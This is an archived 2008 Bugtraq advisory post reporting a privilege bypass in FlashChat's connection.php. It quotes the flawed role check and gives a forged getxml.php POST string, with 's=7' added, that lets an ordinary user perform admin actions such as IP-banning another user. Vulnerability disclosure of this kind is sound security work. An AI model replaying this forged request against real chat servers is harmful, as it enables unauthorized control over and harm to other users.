lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20081017144438.7383.qmail@securityfocus.com>
Date: 17 Oct 2008 14:44:38 -0000
From: ch0p83@...il.com
To: bugtraq@...urityfocus.com
Subject: flashchat severe bug

File: connection.php				

if( 
					ChatServer::userInRole($this->userid, ROLE_ADMIN) || 
					ChatServer::userInRole($this->userid, ROLE_MODERATOR) ||
					($req['s'] == 7) <-- *bypass line*
				  )


This piece of code allows a normal user to bypass role filtering and to be granted admin role as a normal user. To exploit the vulnerability simply send to getxml.php, while into the chat, this post data string (for example intercepting and modifying a legal message packet sent to the server with tamper data plugin of firefox):

for example to ban a user simply add the bypass to the normal ban string request:

replace:
//normal message sent to server thas has being intercepted
sendAndLoad=%5Btype%20Function%5D&t=hi everybody&r=0&id=

with:
//normal ban packet used by admins or mods
sendAndLoad=%5Btype%20Function%5D&t=&r=0&u=5581&b=3&c=banu&cid=1&id=

//forged packet send by attacker
sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=

*note the s=7 added

this will ip-ban user with id 5581 from chat.

eLiSiA - 17-10-2008

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ